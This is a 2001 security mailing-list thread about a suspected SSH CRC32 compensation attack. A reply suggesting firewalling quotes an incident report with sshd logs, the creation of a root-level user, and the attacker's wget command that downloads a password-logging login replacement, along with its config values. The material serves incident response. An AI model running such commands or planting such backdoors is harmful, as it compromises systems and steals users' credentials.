Security Incidents mailing list archives
Re: Attacks against SSH?
From: "Armando B. Ortiz" <aortiz () onlinetraffic com>
Date: 03 Dec 2001 11:20:56 -0800
Per se, I have not seen anyone attacking my systems in general via SSH, but I only allow limited access to my servers via any type of remote login facility. Firewalling your SSH and only allowing connections into it that you want might help to curb some of the attacks people are seeing. It's not very difficult to do...just takes a little time.

On Sun, 2001-12-02 at 23:30, johan.augustsson () adm gu se wrote:

> I stumbled over this post at the openssh-unix-dev mailing list last week -
> http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2
>
> The poster claims that he had OpenSSH-2.9p2-8.7 (latest update for RedHat 7.0) up and running when he received what looks to be a CRC32 attack. A few minutes later you can see (he posted parts of the logfile) a new user being created with uid=0 and then how a connection is made from a system in Israel. There has been no confirmation about what he writes, but I received the following mail as an answer to my questions.
>
> ------ Message ------
> I posted an openssh security alert earlier today and already got some responses. Thanks for everything. Instead of replying to everyone individually I composed the details of the attack.
>
> +++
>
> It does not look like a job of worms. Snort did not detect a mass port scan from the attacker's ip address. It seems that he (I assumed, so I don't have to type he/she all the way) just wants to gain access through openssh.
>
> The server is running Red Hat 7.0, with all packages up to date. The following daemons are running: wu-ftpd, apache, telnet, openssh, named. I never access the system via telnet; it is there just for backup purposes.
>
> Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensation attack: network attack detected
> Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on input.
> Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on input.
> Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on input.
> Nov 25 11:40:00 ns CROND[11022]: (root) CMD ( /sbin/rmmod -as)
> Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528
> Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528, gid=528, home=/home/mattanl, shell=/bin/bash
> Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529
> Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0, gid=529, home=/home/mattan, shell=/bin/bash
>
> After the attacker gained root access, he created two users, mattan and mattanl. He then downloaded a package: wget http://home.dal.net/resolve/login.tgz. The target site has been compromised (hacked by a hacker group in Israel). This is a login replacement package; it logs the user ids and passwords. He modified rk.h to:
>
> #define MY_LOGFILE "/dev/ttypz"
> #define MY_PASSWORD "1245890"
>
> After he compiled and installed the login replacement, something went wrong. /bin/login was zero bytes in length. So when he came back using telnet, he was denied access. I also disabled sshd and kept one session open for remote control after I found login was replaced. I md5 checked the system against a good backup; nothing else was altered. I will try to sniff all packets coming to this server on the ssh port. If he attempts to crack the server again, I will have more details. But I guess I will have to turn the server back on. Thanks for all your time.
> ------ End of message ------
>
> I had some further questions so I mailed the guy once again but have not received any answer.
>
> So, to the main question. Has anyone else had a system compromised by the CRC32 attack when running a version of sshd that is believed to be secure? OpenSSH-2.3.0 or later, SSH 1.2.32 or later.
>
> /Johan Augustsson
> --------------------------------------------------------------------
> Johan Augustsson          Phone: +46 (0)31 773 1000
> Incident Response Team    Fax: +46 (0)31 773 1087
> Göteborg University       E-mail: Johan.Augustsson () adm gu se
> Sweden
> --------------------------------------------------------------------
>
> ----------------------------------------------------------------------------
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
-- 
-----------------------------------------------------------------
From the Linux Box of Armando Ortiz
System Administrator
OnLineTraffic.com
Email: aortiz () onlinetraffic com
Download my public key from:
ftp://209.185.214.98/pub/pubkeys/aortiz () onlinetraffic com pub
or retrieve it from http://www.keyserver.net as aortiz () onlinetraffic com
(Public Key expires 01/04/2002)
All emails from me are signed by this public key.
-----------------------------------------------------------------
Current thread:
- Re: Attacks against SSH?, (continued)
- Re: Attacks against SSH? Jason Baker (Dec 04)
- Re: Attacks against SSH? Michal Zalewski (Dec 04)
- Re: Attacks against SSH? Russell Fulton (Dec 04)
- Re: Attacks against SSH? Przemyslaw Frasunek (Dec 05)
- Re: Attacks against SSH? f.johan.beisser (Dec 04)
- SSH1 CRC32 Compensation Attacks Armando B. Ortiz (Dec 10)
- Re: SSH1 CRC32 Compensation Attacks Andreas Östling (Dec 10)
- Re: SSH1 CRC32 Compensation Attacks Armando Ortiz (Dec 10)
- Re: Attacks against SSH? Steven S (Dec 03)
- Re: Attacks against SSH? Adam Manock (Dec 04)
- Message not available
- Message not available
- Re: Attacks against SSH? johan . augustsson (Dec 06)
- Re: Attacks against SSH? David Chin (Dec 05)
- Re: Attacks against SSH? Skip Carter (Dec 05)
- Re: Attacks against SSH? Skip Carter (Dec 06)